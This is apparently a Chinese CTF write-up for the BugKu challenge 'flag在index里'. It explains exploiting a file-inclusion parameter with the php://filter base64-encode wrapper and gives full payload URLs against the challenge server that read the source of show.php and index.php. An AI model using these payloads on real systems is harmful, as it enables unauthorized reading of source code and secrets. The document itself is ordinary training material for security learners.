flag在index里-BugKu

1.打开之后发现就只有一个超链接,先看看页面源码也没有什么发现。

2.那么我们就点击一下这个click me? no 试试看会发生什么呢,发现跳转到另一个页面了,并且显示文件内容test5。好像没什么特别的用处,但是我们注意观察URL,刚才的URL是:
http://123.206.87.240:8005/post/

我们点击完成之后变成了:
http://123.206.87.240:8005/post/index.php?file=show.php

这里我们看见了file关键字,于是我们就想到了php://filter,我们可以采用php://filter以base64编码的方式读取指定文件的内容:

php://filter/read=convert.base64-encode/resource=[文件路径]

3.我们于是乎可以构造payload,先看看刚才的show.php,文件内容是否可以读取出来。

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=show.php

测试显示出来内容为:dGVzdDU=经过base64解密,确实是test5

4.那么我们现在就可以大胆推测了,而且根据题目提示,我们读取一下index.php文件的内容

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

然后将读取出来的base64加密文件进行解密就可以得出来flag了。

发表评论

电子邮件地址不会被公开。必填项已用 * 标注